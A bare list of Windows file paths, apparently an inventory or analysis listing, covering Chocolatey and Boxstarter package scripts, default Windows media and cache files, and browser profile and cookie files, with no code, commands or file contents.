file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-BoxstarterConfig.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Get-PackageRoot.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Init-Settings.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Install-BoxstarterPackage.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterBuild.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-BoxstarterFromTask.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\invoke-chocolatey.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Invoke-ChocolateyBoxstarter.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-BoxstarterPackage.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\New-PackageFromScript.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Resolve-VMPlugin.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Send-File.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterConfig.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\Boxstarter.Chocolatey\Set-BoxstarterShare.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Confirm-Choice.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Create-BoxstarterTask.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Enter-DotNet4.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Format-BoxStarterMessage.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-BoxstarterTaskContextTempDir.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-CurrentUser.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-HttpResource.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsMicrosoftUpdateEnabled.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Get-IsRemote.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Init-Settings.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-FromTask.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Invoke-RetriableScript.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Log-BoxStarterMessage.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Out-BoxstarterLog.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterError.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Remove-BoxstarterTask.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Start-TimedSection.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Stop-TimedSection.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Test-Admin.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterLogo.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\Boxstarter.Common\Write-BoxstarterMessage.ps1
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVHD.ps1
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\Boxstarter.HyperV\Enable-BoxstarterVM.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\setup.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-BingSearch.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-GameBarTips.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-InternetExplorerESC.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-MicrosoftUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Disable-UAC.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-MicrosoftUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-RemoteDesktop.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Enable-UAC.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-LibraryNames.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Get-UAC.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Install-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Move-LibraryDirectory.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Restart-Explorer.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterPageFile.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-BoxstarterTaskbarOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-CornerNavigationOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-ExplorerOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-StartScreenOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-TaskbarSmall.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Set-WindowsExplorerOptions.ps1
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\Boxstarter.WinConfig\Update-ExecutionPolicy.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-PackageParameters.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Get-UninstallRegistryKey.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Install-ChocolateyDesktopLink.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateyFailure.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-ChocolateySuccess.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-compatibility.extension\extensions\helpers\Write-FileUpdateLog.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AppInstallLocation.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-AvailableDriveLetter.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-EffectiveProxy.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-PackageCacheLocation.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Get-WebContent.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Register-Application.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-core.extension\extensions\Remove-Process.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\DotNetFrameworkHelpers.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Install-ChocolateyInstallPackageAndHandleExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-WindowsUpdateErrorDescription.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-ChocolateyPackageAndHandleExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Install-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Test-WindowsUpdate.ps1
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\Firefox\tools\helpers.ps1
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\GoogleChrome\tools\helpers.ps1
file: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\jre8\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB2919355\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB2919442\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB2999226\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB3035131\Tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB3063858\Tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB3118401\Tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\powershell-core\tools\Reset-PWSHSystemPath.ps1
file: C:\Users\All Users\chocolatey\lib\python3\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\python3\tools\helpers.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist2005\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist2008\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\redirects\RefreshEnv.cmd
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\background.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\device.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\overlay.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{113527a4-45d4-4b6f-b567-97838f1b04b0}\superbar.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\background.png
file: C:\Users\All Users\Microsoft\Device Stage\Device\{8702d817-5aad-4674-9ef3-4d3decd87120}\watermark.png
file: C:\Users\All Users\Microsoft\User Account Pictures\guest.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\user.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile10.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile11.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile12.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile13.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile14.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile15.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile16.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile17.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile18.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile19.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile20.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile21.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile22.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile23.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile24.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile25.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile26.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile27.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile28.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile29.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile30.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile31.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile32.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile33.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile34.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile35.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile36.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile37.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile38.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile39.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile40.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile41.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile42.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile43.bmp
file: C:\Users\All Users\Microsoft\User Account Pictures\Default Pictures\usertile44.bmp
file: C:\Users\All Users\Microsoft\Windows\Caches\cversions.2.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{1A0A057C-F009-4C89-B7DC-E386BCD2DDFD}.2.ver0x0000000000000002.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{4E4260A4-7E39-442E-BC22-7FF751D1C161}.2.ver0x0000000000000002.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x000000000000001e.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000023.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000025.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{8396BDEC-CD34-467F-8EB0-706C57B90A2C}.2.ver0x0000000000000002.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{887A11BA-C40B-40DA-A994-13F5794EDA58}.2.ver0x0000000000000002.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{B77EA8CB-9C6F-4A20-B584-EAC4FF2DF997}.2.ver0x0000000000000002.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000001.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{BC414B5B-48AF-4C2E-9D4C-B5A51C0970CA}.2.ver0x0000000000000002.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000003.db
file: C:\Users\All Users\Microsoft\Windows\Caches\{ECA0F554-74BF-4F43-9EC2-07E05C31BB3E}.2.ver0x0000000000000001.db
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 01.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 02.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 03.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 04.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 05.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 06.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 07.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 08.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 09.wma
file: C:\Users\All Users\Microsoft\Windows\Ringtones\Ringtone 10.wma
file: C:\Users\All Users\Microsoft\Windows Defender\Scans\mpcache-97EFDC75E4C4E7D093DE204032CBD352A3D2415B.bin.DB
file: C:\Users\All Users\Microsoft\Windows NT\MSFax\VirtualInbox\en-US\WelcomeFax.tif
file: C:\Users\Public\Music\Sample Music\Kalimba.mp3
file: C:\Users\Public\Music\Sample Music\Maid with the Flaxen Hair.mp3
file: C:\Users\Public\Music\Sample Music\Sleep Away.mp3
file: C:\Users\Public\Videos\Sample Videos\Wildlife.wmv
file: C:\Users\user\AppData\Local\IconCache.db
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\heavy_ad_intervention_opt_out.db
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\heavy_ad_intervention_opt_out.db
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\previews_opt_out.db
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppBlue.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AppWhite.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.gif
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\AutoPlayOptIn.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\CollectOneDriveLogs.bat
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppBlue.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ElevatedAppWhite.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Error.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\OneDriveLogo.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaCritical.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaError.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\QuotaNearing.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\ScreenshotOptIn.gif
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\Warning.png
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\cloud.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\iceBucket.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\onedrivePremium.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\partiallyFreezing.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settings.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\settingsdisabled.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\stackedIceCubes.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\waterGlass.svg
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\cversions.1.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000013.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Caches\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x0000000000000014.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_256.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_idx.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\microsoft-logo.png
file: C:\Users\user\AppData\Local\Microsoft\Windows\SipNotify\eoscontent\script.js
file: C:\Users\user\AppData\Roaming\Microsoft\Document Building Blocks\1033\15\Built-In Building Blocks.dotx
file: C:\Users\user\AppData\Roaming\Microsoft\Templates\Normal.dotm
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\cert9.db
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\key4.db
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\prefs.js
file: C:\Users\All Users\Boxstarter\BoxStarter.bat
file: C:\Users\All Users\Boxstarter\NOTICE.txt
file: C:\Users\All Users\Boxstarter\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\LICENSE.txt
file: C:\Users\All Users\chocolatey\bin\BoxstarterShell.bat
file: C:\Users\All Users\chocolatey\bin\_processed.txt
file: C:\Users\All Users\chocolatey\config\chocolatey.config.backup
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-DefaultChocolateyLocalFilePath.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Get-NativeInstallerExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-dotnetfx\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Get-NativeInstallerExitCode.ps1
file: C:\Users\All Users\chocolatey\extensions\chocolatey-windowsupdate\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\7zip.install\legal\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\7zip.install\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\autohotkey.install\tools\chocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.bootstrapper\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\BoxStarter.bat
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\boxstarter.chocolatey\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.Common\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\Boxstarter.HyperV\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\NOTICE.txt
file: C:\Users\All Users\chocolatey\lib\BoxStarter.WinConfig\tools\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-DefaultChocolateyLocalFilePath.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Get-NativeInstallerExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-dotnetfx.extension\extensions\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Get-NativeInstallerExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\chocolatey-windowsupdate.extension\extensions\Set-PowerShellExitCode.ps1
file: C:\Users\All Users\chocolatey\lib\dotnet-5.0-runtime\tools\data.ps1
file: C:\Users\All Users\chocolatey\lib\dotnet-6.0-runtime\tools\data.ps1
file: C:\Users\All Users\chocolatey\lib\dotnetfx\tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\KB3033929\Tools\ChocolateyInstall.ps1
file: C:\Users\All Users\chocolatey\lib\OfficeProPlus2013\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyBeforeModify.ps1
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\openjdk\tools\chocolateyuninstall.ps1
file: C:\Users\All Users\chocolatey\lib\python3\legal\VERIFICATION.txt
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyinstall.ps1
file: C:\Users\All Users\chocolatey\lib\tapwindows\tools\chocolateyuninstall.ps1
file: C:\Users\All Users\chocolatey\lib\vcredist140\tools\data.ps1
file: C:\Users\All Users\chocolatey\lib\winrar\tools\chocolateyUninstall.ps1
file: C:\Users\All Users\chocolatey\lib\winrar\tools\helpers.ps1
file: C:\Users\All Users\chocolatey\lib-bad\adobereader\tools\chocolateyuninstall.ps1
file: C:\Users\All Users\chocolatey\tools\checksum.license.txt
file: C:\Users\user\AppData\Local\Google\Chrome\User Data\chrome_shutdown_ms.txt
file: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\chrome_shutdown_ms.txt
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\OneDrivePersonal.cmd
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\errorIcon.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\folder.svg
file: C:\Users\user\AppData\Local\Microsoft\OneDrive\17.3.6743.1212\images\loading.svg
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_1024.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_32.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_96.db
file: C:\Users\user\AppData\Local\Microsoft\Windows\Explorer\thumbcache_sr.db
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\0YHW5220.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\4GSWQ8EN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\AJGBO9CI.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CAP0QFT4.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\CJNGZV8R.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\ERX8C8MI.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\F003S46Q.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\H6EPX8R1.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J29G05RA.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\J52208RT.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\MIYBJCU5.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\NFUEBPFN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\U7UAY5KN.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\UKC8F8RG.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\VGVG2939.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\WFG456IG.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\X8F9LSJ0.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YM639DI1.txt
file: C:\Users\user\AppData\Roaming\Microsoft\Windows\Cookies\YX6BCVUK.txt
file: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\dx9dvnnd.default-release\AlternateServices.txt
